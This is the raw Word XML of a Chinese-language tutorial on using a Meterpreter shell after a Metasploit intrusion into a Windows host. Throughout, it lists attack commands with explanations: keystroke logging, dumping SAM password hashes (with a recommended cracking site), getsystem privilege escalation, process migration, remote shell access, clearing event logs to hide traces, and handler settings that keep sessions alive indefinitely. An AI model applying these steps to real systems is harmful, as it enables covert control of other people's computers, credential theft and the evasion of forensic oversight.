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DBBE" w14:textId="1C2F4F5E" w:rsidR="009C320F" w:rsidRDefault="009C320F" w:rsidP="00AD042D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前提</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E867B5A" w14:textId="3F94B3C8" w:rsidR="00AD042D" w:rsidRDefault="00AD042D" w:rsidP="00AD042D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当你用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>成功的入侵一台Windows主机后，你会获得一个Meterpreter 的Shell，今天我就会给大家讲一讲Meterpreter 获取shell以后的运用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF8B390" w14:textId="1A30D5CB" w:rsidR="00AD042D" w:rsidRDefault="00AD042D" w:rsidP="00AD042D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当你看到了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3D066A" w14:textId="56B3CF23" w:rsidR="00AD042D" w:rsidRDefault="00AD042D" w:rsidP="00AD042D">
      <w:r>
        <w:t xml:space="preserve">[*] Meterpreter </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD042D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>session 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> opened (192.168.195.140:4444 -&gt; 192.168.195.139:1051) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2BD537" w14:textId="77777777" w:rsidR="00AD042D" w:rsidRDefault="00AD042D" w:rsidP="00AD042D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这就代表这你在目标系统上成功的获得了</w:t>
      </w:r>
      <w:r>
        <w:t>Meterpreter的Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689F8E79" w14:textId="77777777" w:rsidR="00AD042D" w:rsidRDefault="00AD042D" w:rsidP="00AD042D"/>
    <w:p w14:paraId="4C299C96" w14:textId="77777777" w:rsidR="00AD042D" w:rsidRDefault="00AD042D" w:rsidP="00AD042D">
      <w:r w:rsidRPr="00AD042D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sessions -l 用于查看你控制的电脑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7368FE28" w14:textId="77777777" w:rsidR="00AD042D" w:rsidRDefault="00AD042D" w:rsidP="00AD042D"/>
    <w:p w14:paraId="01E96F41" w14:textId="60CED261" w:rsidR="00AD042D" w:rsidRDefault="00AD042D" w:rsidP="00AD042D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你会看到：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C6B9D" w14:textId="7C23CE51" w:rsidR="00AD042D" w:rsidRDefault="00AD042D" w:rsidP="00AD042D">
      <w:r>
        <w:t xml:space="preserve">Id Description Tunnel </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC94A84" w14:textId="77777777" w:rsidR="00AD042D" w:rsidRDefault="00AD042D" w:rsidP="00AD042D">
      <w:r w:rsidRPr="00AD042D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> x86/win32  server-PC\Administrator @ SERVER-PC  192.168.195.140:4444 -&gt; 192.168.195.1:52540 (192.168.195.1) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6931B017" w14:textId="1A2CBFED" w:rsidR="00AD042D" w:rsidRDefault="00AD042D" w:rsidP="00AD042D">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323D61A9" w14:textId="77777777" w:rsidR="00AD042D" w:rsidRDefault="00AD042D" w:rsidP="00AD042D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意前面的</w:t>
      </w:r>
      <w:r>
        <w:t>ID号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D85B2B" w14:textId="77777777" w:rsidR="00AD042D" w:rsidRDefault="00AD042D" w:rsidP="00AD042D"/>
    <w:p w14:paraId="0EA91E0A" w14:textId="56B3062D" w:rsidR="00AD042D" w:rsidRDefault="00AD042D" w:rsidP="00AD042D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你要控制哪台就输入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49810FBA" w14:textId="2006BD65" w:rsidR="00A87CAF" w:rsidRDefault="00AD042D" w:rsidP="00AD042D">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD042D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD042D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD042D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD042D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA857B0" w14:textId="77777777" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5"/>
    <w:p w14:paraId="1F7C6A06" w14:textId="5BB5B0EA" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示目标系统信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FC19B6" w14:textId="77777777" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5"/>
    <w:p w14:paraId="306CF79D" w14:textId="7A4FF01C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backround</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出目标系统，回到</w:t>
      </w:r>
      <w:r>
        <w:t>Metasploit主界面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F64138E" w14:textId="77777777" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5"/>
    <w:p w14:paraId="74720077" w14:textId="47239F8D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ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示目标系统上的进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5488CEB0" w14:textId="77777777" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5"/>
    <w:p w14:paraId="7B609B83" w14:textId="77777777" w:rsidR="008967AA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keyscan_start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47875669" w14:textId="6D51EF92" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keyscan_dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> // 查看键盘记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE6628E" w14:textId="77777777" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控目标系统键盘输入，停止监控为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keyscan_stop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="745FC516" w14:textId="77777777" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5"/>
    <w:p w14:paraId="26C756C2" w14:textId="4D0A9CD2" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; migrate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将你的</w:t>
      </w:r>
      <w:r>
        <w:t>Meterpreter移到另一个进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77904BC9" w14:textId="77777777" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先用</w:t>
      </w:r>
      <w:r>
        <w:t>PS命令查看进程后，得到进程ID，然后在执行Migrate （进程ID）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B864F6" w14:textId="77777777" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5"/>
    <w:p w14:paraId="187C16BA" w14:textId="1F87138A" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; ipconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示对方网络信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B809B89" w14:textId="77777777" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5"/>
    <w:p w14:paraId="4BA70CF6" w14:textId="204B5612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getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取用户的服务器运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A92915" w14:textId="77777777" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5"/>
    <w:p w14:paraId="6E367ED7" w14:textId="78D395E1" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入目标电脑，命令提示符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BACF7B7" w14:textId="77777777" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5"/>
    <w:p w14:paraId="4263C357" w14:textId="06358AC8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Idletime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标电脑闲置了多长时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0849BDAC" w14:textId="77777777" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5"/>
    <w:p w14:paraId="2B0E688C" w14:textId="0F352E86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Hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出对方</w:t>
      </w:r>
      <w:r>
        <w:t>SAM数据库里的内容,推荐一个hash破解网站：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03328586" w14:textId="77777777" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5">
      <w:r>
        <w:t>http://www.objectif-securite.ch/products.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44392405" w14:textId="77777777" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5"/>
    <w:p w14:paraId="4495DF14" w14:textId="1D99B079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getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用已自漏洞，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动提权为</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449BE94B" w14:textId="77777777" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5"/>
    <w:p w14:paraId="63E5C3D0" w14:textId="28F495FD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clearev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清除事件日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0095EEB0" w14:textId="77777777" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5"/>
    <w:p w14:paraId="3D9CA0BC" w14:textId="2C673907" w:rsidR="005834C5" w:rsidRDefault="005834C5" w:rsidP="005834C5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; execute （某Windows指令）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在对方电脑上运行该指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0389B4" w14:textId="15C66ECC" w:rsidR="007D670A" w:rsidRDefault="007D670A" w:rsidP="005834C5"/>
    <w:p w14:paraId="7895489F" w14:textId="098426F4" w:rsidR="007D670A" w:rsidRDefault="00A0779F" w:rsidP="005834C5">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0779F">
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0779F">
        <w:t xml:space="preserve"> exploit(multi/handler) &gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0779F">
        <w:t>ExitOnSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0779F">
        <w:t xml:space="preserve"> false</w:t>
      </w:r>
      <w:r w:rsidR="007D670A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保持继续监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD7224D" w14:textId="314BBEA3" w:rsidR="00A0779F" w:rsidRDefault="00A0779F" w:rsidP="005834C5"/>
    <w:p w14:paraId="3DD76A9C" w14:textId="77777777" w:rsidR="00A0779F" w:rsidRDefault="00A0779F" w:rsidP="00A0779F">
      <w:r>
        <w:t># 默认情况下，如果一个会话将在5分钟（300秒）没有任何活动，那么它会被杀死,为防止此情况可将此项修改为0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DD44D0" w14:textId="52C61B19" w:rsidR="00A0779F" w:rsidRDefault="00A0779F" w:rsidP="00A0779F">
      <w:r>
        <w:t xml:space="preserve">msf5 exploit(multi/handler) &gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SessionCommunicationTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r w:rsidR="004E1932" w:rsidRPr="004E1932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防止</w:t>
      </w:r>
      <w:r w:rsidR="004E1932" w:rsidRPr="004E1932">
        <w:t>session超时自动退出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09450F22" w14:textId="77777777" w:rsidR="00B86D15" w:rsidRDefault="00B86D15" w:rsidP="00B86D15">
      <w:r>
        <w:t># 默认情况下，一个星期（604800秒）后，会话将被强制关闭,修改为0可永久不会被关闭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150A672D" w14:textId="39623AEF" w:rsidR="004E1932" w:rsidRDefault="00B86D15" w:rsidP="00B86D15">
      <w:r>
        <w:t xml:space="preserve">msf5 exploit(multi/handler) &gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SessionExpirationTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600D3E43" w14:textId="77777777" w:rsidR="004E1932" w:rsidRDefault="004E1932" w:rsidP="00A0779F"/>
    <w:sectPr w:rsidR="004E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55"/>
    <w:rsid w:val="00326576"/>
    <w:rsid w:val="00482534"/>
    <w:rsid w:val="004E1932"/>
    <w:rsid w:val="005834C5"/>
    <w:rsid w:val="005F2017"/>
    <w:rsid w:val="00742797"/>
    <w:rsid w:val="007D670A"/>
    <w:rsid w:val="0080282B"/>
    <w:rsid w:val="008967AA"/>
    <w:rsid w:val="00990C97"/>
    <w:rsid w:val="009C320F"/>
    <w:rsid w:val="00A0779F"/>
    <w:rsid w:val="00A87CAF"/>
    <w:rsid w:val="00AD042D"/>
    <w:rsid w:val="00B86D15"/>
    <w:rsid w:val="00F36894"/>
    <w:rsid w:val="00FD5655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60E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1F714BFF-3245-4FA4-ACD2-9E009879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34C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834C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834C5"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005834C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8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21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-09T14:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-11T13:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>